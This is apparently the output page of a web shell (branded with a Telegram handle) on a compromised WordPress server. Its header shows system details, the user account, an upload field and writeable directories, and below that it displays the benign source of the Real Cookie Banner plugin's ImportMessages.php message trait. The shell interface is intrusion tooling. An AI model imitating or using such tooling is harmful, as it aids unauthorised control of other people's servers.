https://t.me/RX1948
Server : Apache
System : Linux s1230 5.15.0-139-generic #149~20.04.1 SMP Tue Jul 14 11:21:49 UTC 2026 x86_64
User : p141464 ( 418825)
PHP Version : 7.4.33.12
Disable Function : NONE
Directory :  /html/relaunch-kmu/wp-content/plugins/real-cookie-banner/inc/import/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /html/relaunch-kmu/wp-content/plugins/real-cookie-banner/inc/import/ImportMessages.php
<?php

namespace DevOwl\RealCookieBanner\import;

use DevOwl\RealCookieBanner\settings\Blocker;
use DevOwl\RealCookieBanner\settings\CookieGroup;
use DevOwl\RealCookieBanner\view\customize\banner\HeaderDesign;
use WP_Error;
use WP_Post;
// @codeCoverageIgnoreStart
\defined('ABSPATH') or die('No script kiddies please!');
// Avoid direct file request
// @codeCoverageIgnoreEnd
/**
 * Trait to handle messages output.
 * @internal
 */
trait ImportMessages
{
    /**
     * A top-level cookie type has incorrect scheme.
     *
     * @param string $type
     */
    protected function addMessageWrongUsageKey($type)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Please provide a valid <code>%s</code> key.', 'real-cookie-banner'),
            $type
        ), 'error');
    }
    /**
     * A type definition is incorrect.
     *
     * @param int $index
     * @param string $type
     * @param string $properties
     */
    protected function addMessageMissingProperties($index, $type, $properties)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The %1$s with index <code>%2$d</code> is missing. Required properties: <code>%3$s</code>. Skipped.', 'real-cookie-banner'),
            $type,
            $index,
            $properties
        ), 'error');
    }
    /**
     * `wp_insert_post` failed for given type.
     *
     * @param string $post_title
     * @param string $type
     * @param WP_Error $error
     */
    protected function addMessageCreateFailure($post_title, $type, $error)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('%1$s <strong>%2$s</strong> could not be created due to the following error: <code>%3$s</code>. Skipped.', 'real-cookie-banner'),
            $type,
            $post_title,
            $error->get_error_message()
        ), 'error');
    }
    /**
     * User is trying to import PRO template in free version.
     *
     * @param string $post_title
     */
    protected function addMessageCreateFailureImportingProInFreeVersion($post_title)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('<strong>%s</strong>: You are trying to import a template from Real Cookie Banner PRO, but here you are using the free version of the plugin. Please remove this service before exporting the services or use the PRO version on this website! Skipped.', 'real-cookie-banner'),
            $post_title
        ), 'error');
    }
    /**
     * User is trying to import template without license active, so a synchronization is never possible.
     *
     * @param string $post_title
     */
    protected function addMessageCreateFailureImportingTemplateButNoLicenseActive($post_title)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('<strong>%s</strong>: You are trying to import a template but have not activated a licence. Please activate a licence so that you can import services and content blockers created from templates here! Skipped.', 'real-cookie-banner'),
            $post_title
        ), 'error', 'link', ['href' => '#/licensing?navigateAfterActivation=' . \urlencode('#/import'), 'linkText' => \__('Activate license', 'real-cookie-banner')]);
    }
    /**
     * Add message for non-associated cookies / TCF vendors.
     *
     * @param int $count
     * @param int $associatedCount
     * @param string $post_title
     * @param int $blockerId
     */
    protected function probablyAddMessageBlockerAssociation($count, $associatedCount, $post_title, $blockerId)
    {
        if ($count !== $associatedCount) {
            $this->addMessage(\sprintf(
                // translators:
                \__('The newly created content blocker <code>%s</code> could not correctly resolve some associated relationships.', 'real-cookie-banner'),
                $post_title
            ), 'warning', 'blocker', ['blocker' => $blockerId]);
        }
    }
    /**
     * Add message for blocker with configured media library item
     *
     * @param string $post_title
     * @param int $blockerId
     */
    protected function addMessageBlockerVisualMediaThumbnail($post_title, $blockerId)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The newly created content blocker <code>%s</code> could not set the preview image because it refers to a media item within your media library (ID)', 'real-cookie-banner'),
            $post_title
        ), 'warning', 'blocker', ['blocker' => $blockerId]);
    }
    /**
     * Add message for banner link with configured page ID.
     *
     * @param string $post_title
     */
    protected function addMessageBannerLinkPageId($post_title)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The newly created footer link <code>%s</code> could not set the selected page because it refers to a page item (ID)', 'real-cookie-banner'),
            $post_title
        ), 'warning', 'link', ['href' => '#/settings', 'linkText' => \__('Select page', 'real-cookie-banner')]);
    }
    /**
     * The cookie got not created because already exists.
     *
     * @param string $post_name
     */
    protected function addMessageSkipExistingCookie($post_name)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The service <code>%s</code> already exists. Skipped.', 'real-cookie-banner'),
            $post_name
        ), 'info');
    }
    /**
     * The content blocker got not created because already exists.
     *
     * @param string $post_name
     */
    protected function addMessageSkipExistingBlocker($post_name)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The content blocker <code>%s</code> already exists. Skipped.', 'real-cookie-banner'),
            $post_name
        ), 'info');
    }
    /**
     * The banner link got not created because already exists.
     *
     * @param string $post_name
     */
    protected function addMessageSkipExistingBannerLink($post_name)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The footer link <code>%s</code> already exists or may only be configured once. Skipped.', 'real-cookie-banner'),
            $post_name
        ), 'info');
    }
    /**
     * The TCF vendor configuration got not created because already exists.
     *
     * @param int $vendorId
     */
    protected function addMessageSkipExistingTcfVendorConfiguration($vendorId)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The TCF vendor configuration for vendor with ID <code>%s</code> already exists. Skipped.', 'real-cookie-banner'),
            $vendorId
        ), 'info');
    }
    /**
     * The content blocker got duplicated.
     *
     * @param boolean|WP_Post $found
     * @param string $post_name
     * @param int $original
     * @param int $duplicate
     */
    protected function probablyAddMessageDuplicateBlocker($found, $post_name, $original, $duplicate)
    {
        if ($found === \false) {
            return;
        }
        // Add a message when a duplicate got created
        $this->addMessage(\sprintf(
            // translators:
            \__('The content blocker <code>%s</code> already exists. A new content blocker has been created anyway.', 'real-cookie-banner'),
            $post_name
        ), 'warning', 'blockerDuplicate', ['blockerDuplicate' => ['original' => $original, 'duplicate' => $duplicate]]);
    }
    /**
     * The cookie got duplicated.
     *
     * @param boolean|WP_Post $found
     * @param string $post_name
     * @param int $group
     * @param int $created
     */
    protected function probablyAddMessageDuplicateCookie($found, $post_name, $group, $created)
    {
        if ($found === \false) {
            return;
        }
        $this->addMessage(\sprintf(
            // translators:
            \__('The service <code>%s</code> already exists. A new service has been created anyway.', 'real-cookie-banner'),
            $post_name
        ), 'warning', 'cookieDuplicate', ['cookieDuplicate' => ['original' => [\get_the_terms($found['ID'], CookieGroup::TAXONOMY_NAME)[0]->term_id, $found['ID']], 'duplicate' => [$group, $created]]]);
    }
    /**
     * The cookie could not be associated to the given group, did fallback.
     *
     * @param boolean $groupNotFound
     * @param string $post_title
     * @param int $group
     * @param int $created
     */
    protected function probablyAddMessageCookieGroupNotFound($groupNotFound, $post_title, $group, $created)
    {
        if ($groupNotFound) {
            $this->addMessage(\sprintf(
                // translators:
                \__('The newly created service <code>%s</code> has been added to the fallback service group because the original service group could not be found.', 'real-cookie-banner'),
                $post_title
            ), 'warning', 'cookie', ['cookie' => [$group, $created]]);
        }
    }
    /**
     * Cookie could not be assigned to cookie.
     *
     * @param int $postId
     * @param WP_Error $error
     */
    protected function addMessageCookieAssignFailure($postId, $error)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The service <strong>%1$s</strong> could not be assigned to the given group due to the following error: <code>%2$s</code>. Skipped.', 'real-cookie-banner'),
            \get_the_title($postId),
            $error->get_error_message()
        ), 'error');
    }
    /**
     * Cookie group could not be updated.
     *
     * @param string $name
     * @param WP_Error $error
     */
    protected function addMessageCookieGroupUpdateFailure($name, $error)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The service group <strong>%1$s</strong> could not be updated due to the following error: <code>%2$s</code>. Skipped.', 'real-cookie-banner'),
            $name,
            $error->get_error_message()
        ), 'error');
    }
    /**
     * Cookie group is not created instead it was updated.
     *
     * @param string $name
     */
    protected function addMessageCookieGroupUpdatedInfo($name)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('The service group <strong>%s</strong> was not created. Instead, the existing one has been updated.', 'real-cookie-banner'),
            $name
        ), 'info');
    }
    /**
     * A PRO-only setting can not be imported in lite.
     *
     * @param boolean $onlyPro
     * @param string $key
     */
    protected function probablyAddMessageSettingOnlyPro($onlyPro, $key)
    {
        if ($onlyPro) {
            $this->addMessage(\sprintf(
                // translators:
                \__('Setting/Option <code>%s</code> can only be imported in the PRO version. Skipped.', 'real-cookie-banner'),
                $key
            ), 'error');
        }
    }
    /**
     * `update_option` failured.
     *
     * @param string $optionName
     */
    protected function addMessageUpdateOptionFailure($optionName)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Setting/Option <code>%s</code> could not be updated. Skipped.', 'real-cookie-banner'),
            $optionName
        ), 'error');
    }
    /**
     * Option not related to RCB.
     *
     * @param string $key
     */
    protected function addMessageOptionOutdated($key)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Settings/Options <code>%s</code> not found or obsolete. Skipped.', 'real-cookie-banner'),
            $key
        ), 'error');
    }
    /**
     * An option relates to a page ID, it can never be imported.
     *
     * @param string $name
     * @param string $key
     */
    protected function addMessageOptionRelatesPageId($name, $key)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Setting/Option <strong>%1$s</strong> (key <code>%2$s</code>) cannot be imported because it refers to a page (ID). Skipped.', 'real-cookie-banner'),
            $name,
            $key
        ), 'warning', 'settings', ['settingsTab' => '']);
    }
    /**
     * An option relates to a media, it can never be imported.
     *
     * @param string $name
     * @param string $key
     */
    protected function addMessageOptionRelatesMedia($name, $key)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Setting/Option <strong>%1$s</strong> (key <code>%2$s</code>) cannot be imported because it refers to a media URL/ID. Skipped.', 'real-cookie-banner'),
            $name,
            $key
        ), 'warning', 'link', ['href' => \admin_url('/customize.php?autofocus[control]=' . HeaderDesign::HEADLINE_LOGO)]);
    }
    /**
     * Multisite options can not be imported due to reference issues.
     *
     * @param string $name
     * @param string $key
     */
    protected function addMessageOptionMultisite($name, $key)
    {
        $this->addMessage(\sprintf(
            // translators:
            \__('Setting/Option <strong>%1$s</strong> (key <code>%2$s</code>) cannot be imported. Skipped.', 'real-cookie-banner'),
            $name,
            $key
        ), 'warning', 'settings', ['settingsTab' => 'multisite']);
    }
}

https://t.me/RX1948 - 2025